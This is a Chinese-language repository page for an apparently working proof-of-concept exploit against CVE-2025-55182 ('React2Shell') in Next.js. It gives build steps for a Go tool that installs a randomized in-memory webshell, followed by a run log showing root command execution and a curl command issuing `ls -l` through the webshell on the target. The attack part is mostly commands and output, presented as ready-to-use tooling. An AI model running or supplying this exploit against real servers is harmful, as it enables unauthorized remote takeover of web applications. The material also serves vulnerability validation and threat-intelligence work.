vulncheck-oss/cve-2025-55182
GitHub: vulncheck-oss/cve-2025-55182
针对 CVE-2025-55182 Next.js React2Shell 漏洞的 PoC 工具,支持部署随机化内存型 webshell 实现远程命令执行。
Stars: 2 | Forks: 0
# CVE-2025-55182:利用 artifacts
这是 [VulnCheck Initial Access Intelligence](https://www.vulncheck.com/product/initial-access-intelligence) 中针对 CVE-2025-55182 React2Shell 漏洞的一小部分 artifacts 导出。关于这些 artifacts 的一些团队观察结果可以在[博文](https://www.vulncheck.com/blog/reacting-to-shells-react2shell-variants-ecosystem)中阅读。
## 索引
* [./inmem-webshell](inmem-webshell) - 一个内存型 webshell 变体
### 构建
所有组件均基于我们的利用框架 [go-exploit](https://github.com/vulncheck-oss/go-exploit) 构建。每个目录都包含一份相关 artifact 的副本。
如果您手头有配置了 `golangci-lint` 和 GNU `make` 的 Go 构建环境,可以使用 `make`:
```
$ make
gofmt -d -w cve-2025-55182.go
golangci-lint run --fix --timeout 3m cve-2025-55182.go
0 issues.
GOOS=linux GOARCH=amd64 go build -o build/cve-2025-55182_linux-amd64 cve-2025-55182.go
```
要将 exploit 构建到 docker 镜像中,只需:
```
make docker
```
### 内存型 NextJS Webshell
这是一个使用 React2Shell 针对 next.js 的内存型 webshell 实现。我们最初是在[这里](https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478?tab=readme-ov-file#-runtime-memory-shell-)看到此演示的。该 webshell 在每次新攻击中都会随机化。
```
poptart@grimm $ ./build/cve-2025-55182_linux-amd64 -rhost 172.17.0.1 -rport 3000 -e
time=2025-12-08T15:28:06.892-07:00 level=STATUS msg="Starting target" index=0 host=172.17.0.1 port=3000 ssl=false "ssl auto"=false
time=2025-12-08T15:28:06.892-07:00 level=STATUS msg="Generating webshell payload"
time=2025-12-08T15:28:06.893-07:00 level=STATUS msg="Uploading webshell to target"
time=2025-12-08T15:28:16.902-07:00 level=ERROR msg="HTTP request error: Post \"http://172.17.0.1:3000/\": context deadline exceeded (Client.Timeout exceeded while awaiting headers)"
time=2025-12-08T15:28:16.902-07:00 level=SUCCESS msg="Webshell installed!" location=http://172.17.0.1:3000/UByGoR
time=2025-12-08T15:28:16.902-07:00 level=STATUS msg="Testing `id`" testurl="http://172.17.0.1:3000/UByGoR?z=id"
time=2025-12-08T15:28:16.917-07:00 level=SUCCESS msg="uid=0(root) gid=0(root) groups=0(root)\n"
time=2025-12-08T15:28:16.917-07:00 level=SUCCESS msg="Exploit successfully completed" exploited=true
poptart@grimm $ curl http://172.17.0.1:3000/UByGoR?z=ls%20-l
total 72
-rw-r--r-- 1 root root 77 Dec 4 23:41 jsconfig.json
-rw-r--r-- 1 root root 92 Dec 4 23:41 next.config.mjs
drwxr-xr-x 172 root root 173 Dec 4 23:41 node_modules
-rw-r--r-- 1 root root 16384 Dec 4 23:41 notes.db
-rw-r--r-- 1 root root 123663 Dec 4 23:41 package-lock.json
-rw-r--r-- 1 root root 467 Dec 4 23:41 package.json
-rw-r--r-- 1 root root 6028 Dec 4 23:41 seed.sql
drwxr-xr-x 3 root root 3 Dec 4 23:41 src
```
标签:CISA项目, CVE-2025-55182, EVTX分析, EVTX分析, EVTX分析, Go语言, Maven, poc, RCE, React, React2Shell, Syscalls, Webshell, 内存马, 初始访问, 威胁模拟, 攻击脚本, 日志审计, 漏洞验证, 程序破解, 编程工具, 网络安全, 请求拦截, 远程代码执行, 隐私保护